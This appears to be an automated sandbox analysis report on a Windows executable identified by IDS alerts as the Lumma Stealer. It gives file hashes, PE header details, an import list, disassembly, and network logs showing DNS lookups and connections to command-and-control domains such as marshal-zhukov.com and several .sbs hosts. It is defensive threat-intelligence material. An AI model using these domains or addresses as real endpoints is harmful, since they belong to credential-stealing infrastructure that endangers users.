Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................................x................q...................Rich...........PE..L...J:-a...........!......)...........).......)..............................pF.....?<E...@...........................?.......?.|.....C...............D.......C.0.....>.T.............................>.@.............)..............................text....).......)................. ..`.rdata...6....)..8....).............@..@.data.........@.......?.............@....rsrc.........C.......A.............@..@.reloc..0.....C.......A.............@..B........................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\ceFgl3jkkk.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):25320
Entropy (8bit):6.533727727613444
Encrypted:false
SSDEEP:768:KtbCEbBS3sEnqhrVusklI8mGgDG4yjshHZ:8bB4qNVusklI8mGsyjYZ
MD5:E03B622ACBA9D02DC5A10364824EDE8C
SHA1:40DB1A1A0D81C5D165D043502B1205B22BC238A4
SHA-256:DE914028BFDDF19EF7279F04C92EF118C59B1BA8B5E27C76A7932E086BBC7978
SHA-512:02ABE8C060A2E046E92DB4FDF5EFDEAF6A870703AD313D14D3E8A3A308CCA032C1D7B7AC40B0C346C0D8BF3193C42DFC69BF50450C9545D6BB6704FC0F5D3D5B
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............y..y..y......y...x..y...|..y...}..y...z..y.h.x..y...x..y..x...y.h.q..y.h.y..y.h...y.h.{..y.Rich.y.................PE..L...r:-a...........!.........&...............0.......................................9....@......................... ;..L...l;..x....`...............F.......p......d6..T............................6..@............0...............................text............................... ..`.rdata..6....0......."..............@..@.data........P.......6..............@....rsrc........`.......8..............@..@.reloc.......p.......B..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Users\user\Desktop\ceFgl3jkkk.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1115880
                                                                                                                    Entropy (8bit):5.387181050869946
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:D13VQCb5Pfhnzr0ql9L8kUMmuZ63NKM7IRG5eeIDe6VZyrIBHdQLhfFE+Ck5t:D13jZV0m9suVMMREtIC6Vo4u8k5t
                                                                                                                    MD5:FED3EC3AE0C349D65C0E90025B5507E6
                                                                                                                    SHA1:3A1864A89C90D2837B77C6A1881263E9764FF8D3
                                                                                                                    SHA-256:CE67BBA9B38FC6023D8EFDB06223B823CEB5B7C316DA48EA1EC9E404D05384A4
                                                                                                                    SHA-512:87047F4B55C43D59FCD643879CC2CC6D03E18963E36D6C3F49AB37C8B8672B31F61ABD9AC1FAD732778FD02FB3D1E5308572C0297FB51E2FF7C8A26354C54C58
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.eb.f.1.f.1.f.1...1.f.1S..0.f.1S..0.f.1S..0.f.1S..0.f.1...0.f.1...0.f.1.f.1Ff.1...0.f.1...0.f.1...1.f.1...0.f.1Rich.f.1........PE..L...r:-a...........!.....H...........F.......`......................................e.....@.............................X...8...........................................T...........................p...@............`..4............................text...KF.......H.................. ..`.rdata..b~...`.......L..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.993255227216837
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: ceFgl3jkkk.exe
File size: 7'166'290 bytes
MD5: 9cf2fcabd10ee683a3652815014b368c
SHA1: f49914f1cf2b7fbba812eb8fd807b19065008b23
SHA256: 857270428d9d88c5da6d8b9d33059d4e29347637879a17975631408c5359b623
SHA512: 8dcf40e92d40627fb79413c6662e43e87d1dcd23e2825aa87a96e09706cff25e5e894376fdf5570d0e8470c36a4574810fc8afea3c720595fac07b93d0904117
SSDEEP: 196608:e741InG5lNniIbZg4TYc1vR31A4zur5MOjjDDTTVCjE/gsOt0G1:e741ZbPH1AJCY/Ur
TLSH: 2A763319DE51D061E5BB083014B0CB35ED7B6AB10B24847FB6C81DFA4E71AD0B4A6E9F
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pQ)j..)j..)j..=...%j..=....j..=...;j..O...-j..{....j..{...;j..{...;j..=..."j..)j...j......:j......(j..Rich)j.................
Icon Hash: 27393d590b2f0f06
Entrypoint: 0x40997c
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x670EBB30 [Tue Oct 15 18:57:52 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: bdaa4f11fa75ae7944b223ba584c1f57

Instruction
call 00007F3C107FCE45h
jmp 00007F3C107FC81Fh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [004230D8h]
push dword ptr [ebp+08h]
call dword ptr [004230D4h]
push C0000409h
call dword ptr [0042309Ch]
push eax
call dword ptr [004230DCh]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [004230E0h]
test eax, eax
je 00007F3C107FC9A7h
push 00000002h
pop ecx
int 29h
mov dword ptr [0043ED48h], eax
mov dword ptr [0043ED44h], ecx
mov dword ptr [0043ED40h], edx
mov dword ptr [0043ED3Ch], ebx
mov dword ptr [0043ED38h], esi
mov dword ptr [0043ED34h], edi
mov word ptr [0043ED60h], ss
mov word ptr [0043ED54h], cs
mov word ptr [0043ED30h], ds
mov word ptr [0043ED2Ch], es
mov word ptr [0043ED28h], fs
mov word ptr [0043ED24h], gs
pushfd
pop dword ptr [0043ED58h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0043ED4Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0043ED50h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0043ED5Ch], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [0043EC98h], 00010001h

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2f35c | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x40000 | 0x6280 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x47000 | 0x1afc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2e90c | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2e928 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x23000 | 0x1ec | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x21248 | 0x21400 | 3f1efcb5e498393bd3521b7da7842c97 | False | 0.5795788298872181 | MPEG-4 LOAS | 6.630648810716619 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x23000 | 0xcea8 | 0xd000 | b3e94a3575b62e3aad2f6189c023817e | False | 0.5223294771634616 | data | 5.97383677665431 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x30000 | 0xf874 | 0xc00 | fa712c3d503d1593515a35e4bc75a27b | False | 0.1318359375 | data | 1.67626223661243 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x40000 | 0x6280 | 0x6400 | 6f8dd20db08fe009e3df837566485a74 | False | 0.4543359375 | data | 4.879978248372994 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x47000 | 0x1afc | 0x1c00 | 3a6614674722dad462885b32e542d3cb | False | 0.7931082589285714 | data | 6.57465318049585 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x40384 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0, resolution 2835 x 2835 px/m | English | United States | 0.6854693140794224
RT_ICON | 0x40c2c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0, resolution 2835 x 2835 px/m | English | United States | 0.5039868667917449
RT_ICON | 0x41cd4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0, resolution 2835 x 2835 px/m | English | United States | 0.5101156069364162
RT_ICON | 0x4223c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0, resolution 2835 x 2835 px/m | English | United States | 0.6631205673758865
RT_ICON | 0x426a4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0, resolution 2835 x 2835 px/m | English | United States | 0.4566390041493776
RT_STRING | 0x44c4c | 0x2f2 | data | | | 0.35543766578249336
RT_STRING | 0x44f40 | 0x30c | data | | | 0.3871794871794872
RT_STRING | 0x4524c | 0x2ce | data | | | 0.42618384401114207
RT_STRING | 0x4551c | 0x68 | data | | | 0.75
RT_STRING | 0x45584 | 0xb4 | data | | | 0.6277777777777778
RT_STRING | 0x45638 | 0xae | data | | | 0.5344827586206896
RT_RCDATA | 0x456e8 | 0x2c | data | | | 1.2045454545454546
RT_GROUP_ICON | 0x45714 | 0x4c | data | English | United States | 0.7894736842105263
RT_VERSION | 0x45760 | 0x4f4 | data | English | United States | 0.277602523659306
RT_MANIFEST | 0x45c54 | 0x62c | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4240506329113924

DLL | Import
USER32.dll | CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongW, GetWindowLongW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll |
KERNEL32.dll | GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, FlushFileBuffers, GetCurrentDirectoryW, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetEnvironmentStringsW, GetEnvironmentVariableW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, GetCommandLineW, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, DecodePointer, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, RaiseException, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindClose, FindFirstFileExW, FindNextFileW, SetStdHandle, SetConsoleCtrlHandler, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, CompareStringW, LCMapStringW
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW

Language of compilation system | Country where language is spoken | Map
English | United States |

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-21T13:45:22.256926+0100 | 2056570 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) | 1 | 192.168.2.9 | 57919 | 1.1.1.1 | 53 | UDP
2024-11-21T13:45:22.503700+0100 | 2056568 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) | 1 | 192.168.2.9 | 64895 | 1.1.1.1 | 53 | UDP
2024-11-21T13:45:22.773752+0100 | 2056566 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) | 1 | 192.168.2.9 | 61039 | 1.1.1.1 | 53 | UDP
2024-11-21T13:45:23.031762+0100 | 2056564 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) | 1 | 192.168.2.9 | 59111 | 1.1.1.1 | 53 | UDP
2024-11-21T13:45:23.292257+0100 | 2056562 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) | 1 | 192.168.2.9 | 53627 | 1.1.1.1 | 53 | UDP
2024-11-21T13:45:23.539228+0100 | 2056560 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) | 1 | 192.168.2.9 | 60602 | 1.1.1.1 | 53 | UDP
2024-11-21T13:45:23.786678+0100 | 2056558 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) | 1 | 192.168.2.9 | 49306 | 1.1.1.1 | 53 | UDP
2024-11-21T13:45:24.034227+0100 | 2056556 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) | 1 | 192.168.2.9 | 61384 | 1.1.1.1 | 53 | UDP
2024-11-21T13:45:26.060652+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49765 | 104.102.49.254 | 443 | TCP
2024-11-21T13:45:26.878290+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.9 | 49765 | 104.102.49.254 | 443 | TCP
2024-11-21T13:45:27.114029+0100 | 2057415 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marshal-zhukov .com) | 1 | 192.168.2.9 | 63122 | 1.1.1.1 | 53 | UDP
2024-11-21T13:45:28.616606+0100 | 2057416 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) | 1 | 192.168.2.9 | 49776 | 188.114.97.3 | 443 | TCP
2024-11-21T13:45:28.616606+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49776 | 188.114.97.3 | 443 | TCP
2024-11-21T13:45:29.330441+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.9 | 49776 | 188.114.97.3 | 443 | TCP
2024-11-21T13:45:29.330441+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49776 | 188.114.97.3 | 443 | TCP
2024-11-21T13:45:29.977517+0100 | 2057416 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) | 1 | 192.168.2.9 | 49780 | 188.114.97.3 | 443 | TCP
2024-11-21T13:45:29.977517+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49780 | 188.114.97.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 13:45:24.515242100 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:24.515281916 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:24.515763998 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:24.518544912 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:24.518553972 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:26.060585022 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:26.060652018 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:26.068897963 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:26.068924904 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:26.069195032 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:26.117918015 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:26.122486115 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:26.163336039 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:26.878411055 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:26.878463984 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:26.878480911 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:26.878495932 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:26.878508091 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:26.878525019 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:26.878540993 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:26.878555059 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:26.878556967 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:26.878604889 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:26.878604889 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:26.878607035 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:26.930429935 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:27.097150087 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:27.097162962 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:27.097188950 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:27.097212076 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:27.098473072 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:27.098473072 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:27.098493099 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:27.098746061 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:27.105298996 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:27.105727911 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:27.110918045 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:27.111236095 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:27.112019062 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:27.112019062 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:27.112019062 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:27.112369061 CET | 49765 | 443 | 192.168.2.9 | 104.102.49.254
Nov 21, 2024 13:45:27.112380981 CET | 443 | 49765 | 104.102.49.254 | 192.168.2.9
Nov 21, 2024 13:45:27.351062059 CET | 49776 | 443 | 192.168.2.9 | 188.114.97.3
Nov 21, 2024 13:45:27.351098061 CET | 443 | 49776 | 188.114.97.3 | 192.168.2.9
Nov 21, 2024 13:45:27.351341963 CET | 49776 | 443 | 192.168.2.9 | 188.114.97.3
Nov 21, 2024 13:45:27.351722002 CET | 49776 | 443 | 192.168.2.9 | 188.114.97.3
Nov 21, 2024 13:45:27.351743937 CET | 443 | 49776 | 188.114.97.3 | 192.168.2.9
Nov 21, 2024 13:45:28.616449118 CET | 443 | 49776 | 188.114.97.3 | 192.168.2.9
Nov 21, 2024 13:45:28.616605997 CET | 49776 | 443 | 192.168.2.9 | 188.114.97.3
Nov 21, 2024 13:45:28.618345022 CET | 49776 | 443 | 192.168.2.9 | 188.114.97.3
Nov 21, 2024 13:45:28.618355989 CET | 443 | 49776 | 188.114.97.3 | 192.168.2.9
Nov 21, 2024 13:45:28.618606091 CET | 443 | 49776 | 188.114.97.3 | 192.168.2.9
Nov 21, 2024 13:45:28.619815111 CET | 49776 | 443 | 192.168.2.9 | 188.114.97.3
Nov 21, 2024 13:45:28.619844913 CET | 49776 | 443 | 192.168.2.9 | 188.114.97.3
Nov 21, 2024 13:45:28.619899988 CET | 443 | 49776 | 188.114.97.3 | 192.168.2.9
Nov 21, 2024 13:45:29.330446959 CET | 443 | 49776 | 188.114.97.3 | 192.168.2.9
Nov 21, 2024 13:45:29.330547094 CET | 443 | 49776 | 188.114.97.3 | 192.168.2.9
Nov 21, 2024 13:45:29.330702066 CET | 49776 | 443 | 192.168.2.9 | 188.114.97.3
Nov 21, 2024 13:45:29.330847979 CET | 49776 | 443 | 192.168.2.9 | 188.114.97.3
Nov 21, 2024 13:45:29.330862999 CET | 443 | 49776 | 188.114.97.3 | 192.168.2.9
Nov 21, 2024 13:45:29.330939054 CET | 49776 | 443 | 192.168.2.9 | 188.114.97.3
Nov 21, 2024 13:45:29.330944061 CET | 443 | 49776 | 188.114.97.3 | 192.168.2.9
Nov 21, 2024 13:45:29.389620066 CET | 49780 | 443 | 192.168.2.9 | 188.114.97.3
Nov 21, 2024 13:45:29.389658928 CET | 443 | 49780 | 188.114.97.3 | 192.168.2.9
Nov 21, 2024 13:45:29.389746904 CET | 49780 | 443 | 192.168.2.9 | 188.114.97.3
Nov 21, 2024 13:45:29.390088081 CET | 49780 | 443 | 192.168.2.9 | 188.114.97.3
Nov 21, 2024 13:45:29.390104055 CET | 443 | 49780 | 188.114.97.3 | 192.168.2.9
Nov 21, 2024 13:45:29.977516890 CET | 49780 | 443 | 192.168.2.9 | 188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 13:45:22.011275053 CET | 55500 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 13:45:22.253149033 CET | 53 | 55500 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 13:45:22.256926060 CET | 57919 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 13:45:22.498781919 CET | 53 | 57919 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 13:45:22.503700018 CET | 64895 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 13:45:22.744905949 CET | 53 | 64895 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 13:45:22.773751974 CET | 61039 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 13:45:23.016148090 CET | 53 | 61039 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 13:45:23.031761885 CET | 59111 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 13:45:23.274560928 CET | 53 | 59111 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 13:45:23.292257071 CET | 53627 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 13:45:23.535934925 CET | 53 | 53627 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 13:45:23.539227962 CET | 60602 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 13:45:23.783781052 CET | 53 | 60602 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 13:45:23.786678076 CET | 49306 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 13:45:24.032608032 CET | 53 | 49306 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 13:45:24.034226894 CET | 61384 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 13:45:24.278294086 CET | 53 | 61384 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 13:45:24.281472921 CET | 57240 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 13:45:24.508641005 CET | 53 | 57240 | 1.1.1.1 | 192.168.2.9
Nov 21, 2024 13:45:27.114028931 CET | 63122 | 53 | 192.168.2.9 | 1.1.1.1
Nov 21, 2024 13:45:27.349638939 CET | 53 | 63122 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 21, 2024 13:45:22.011275053 CET | 192.168.2.9 | 1.1.1.1 | 0xcdb9 | Standard query (0) | droppyrelivei.cfd | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:22.256926060 CET | 192.168.2.9 | 1.1.1.1 | 0xc1cb | Standard query (0) | mathcucom.sbs | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:22.503700018 CET | 192.168.2.9 | 1.1.1.1 | 0x8738 | Standard query (0) | allocatinow.sbs | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:22.773751974 CET | 192.168.2.9 | 1.1.1.1 | 0x83d6 | Standard query (0) | enlargkiw.sbs | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:23.031761885 CET | 192.168.2.9 | 1.1.1.1 | 0x60fd | Standard query (0) | resinedyw.sbs | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:23.292257071 CET | 192.168.2.9 | 1.1.1.1 | 0x202b | Standard query (0) | vennurviot.sbs | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:23.539227962 CET | 192.168.2.9 | 1.1.1.1 | 0xf2d2 | Standard query (0) | ehticsprocw.sbs | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:23.786678076 CET | 192.168.2.9 | 1.1.1.1 | 0x824a | Standard query (0) | condifendteu.sbs | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:24.034226894 CET | 192.168.2.9 | 1.1.1.1 | 0xbafc | Standard query (0) | drawwyobstacw.sbs | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:24.281472921 CET | 192.168.2.9 | 1.1.1.1 | 0xd211 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:27.114028931 CET | 192.168.2.9 | 1.1.1.1 | 0x99e4 | Standard query (0) | marshal-zhukov.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 21, 2024 13:44:59.116725922 CET | 1.1.1.1 | 192.168.2.9 | 0x5269 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 21, 2024 13:44:59.116725922 CET | 1.1.1.1 | 192.168.2.9 | 0x5269 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:22.253149033 CET | 1.1.1.1 | 192.168.2.9 | 0xcdb9 | Name error (3) | droppyrelivei.cfd | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:22.498781919 CET | 1.1.1.1 | 192.168.2.9 | 0xc1cb | Name error (3) | mathcucom.sbs | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:22.744905949 CET | 1.1.1.1 | 192.168.2.9 | 0x8738 | Name error (3) | allocatinow.sbs | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:23.016148090 CET | 1.1.1.1 | 192.168.2.9 | 0x83d6 | Name error (3) | enlargkiw.sbs | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:45:23.274560928 CET | 1.1.1.1 | 192.168.2.9 | 0x60fd | Name error (3) | resinedyw.sbs | none | none | A (IP address) | IN (0x0001) | false
